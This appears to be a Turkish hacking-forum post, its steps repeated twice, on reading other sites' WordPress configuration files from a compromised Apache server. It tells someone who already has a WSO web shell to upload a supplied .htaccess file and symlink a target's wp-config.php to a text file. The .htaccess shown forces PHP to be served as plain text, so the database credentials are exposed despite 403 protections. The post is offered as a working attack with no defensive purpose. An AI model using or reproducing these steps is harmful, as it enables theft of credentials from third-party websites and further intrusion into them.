Apache Server Bypass Method
Selamun aleyküm beyler apache serverlerde iş gören bir .htacces klasörü var bilenler için değil bilmeyenler için diyerekten geçelim;
Bildiğimiz gibi servere iş görür bir .htaccess dosyası upload ettiğinizde bypasslayamıyacağanız sw yoktur biz de yine .htaccess dosyası ile işimizi halledicez muhtemelen config çekmek isterken "403 forbidden" hatası aldınız bunun çözümüne adım adım bakalım;
1) Wso shellin alt kısmından make dir bölümünden klasör oluşturuyoruz benim klasörümün adı 123
2) Oluşturduğumuz klasöre girip wso shellden alt kısımda upload file bölümünden size vereceğim .htaccess i 123 klasörüne upload ediyoruz
3) Ve execute bölümünden "ln -s /home/name/www/wp-config.php scorpiol.txt" yani hedef sitenin config yolunu yazıyoruz daha sonra www.örneksite.com/123/ olarak girdiğinizde configler karşınızda olacak.Ben scorpiol.txt olarak yaptım siz onu notepad ile düzenleyip kendi isminizi koyabilirsiniz.
Arkadaşlar mantık şu 123 klasörüne upload ettiğimiz size vermiş olduğum ".htaccess" dosyası "scorpiol.txt" adlı her dosyayı dışarıya yansıtmaya odaklı oluyor belki çektiğiniz configin içine girince "403 forbidden" hatası alıyor olabilirsiniz ama bu .htaccess o hatayı es geçip direkt "scorpiol.txt" dosyasındaki configi hedef alıyor ve dosyanın içine girmeden okuyabiliyorsunuz.
Not; Her swde işe yaramaz ama çoğu swde faydasını gördüm sizde görürsünüz.
.htaccess
1) Wso shellin alt kısmından make dir bölümünden klasör oluşturuyoruz benim klasörümün adı 123
2) Oluşturduğumuz klasöre girip wso shellden alt kısımda upload file bölümünden size vereceğim .htaccess i 123 klasörüne upload ediyoruz
3) Ve execute bölümünden "ln -s /home/name/www/wp-config.php scorpiol.txt" yani hedef sitenin config yolunu yazıyoruz daha sonra www.örneksite.com/123/ olarak girdiğinizde configler karşınızda olacak.Ben scorpiol.txt olarak yaptım siz onu notepad ile düzenleyip kendi isminizi koyabilirsiniz.
Arkadaşlar mantık şu 123 klasörüne upload ettiğimiz size vermiş olduğum ".htaccess" dosyası "scorpiol.txt" adlı her dosyayı dışarıya yansıtmaya odaklı oluyor belki çektiğiniz configin içine girince "403 forbidden" hatası alıyor olabilirsiniz ama bu .htaccess o hatayı es geçip direkt "scorpiol.txt" dosyasındaki configi hedef alıyor ve dosyanın içine girmeden okuyabiliyorsunuz.
Not; Her swde işe yaramaz ama çoğu swde faydasını gördüm sizde görürsünüz.
.htaccess
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName scorpiol.txt
Yorum Gönder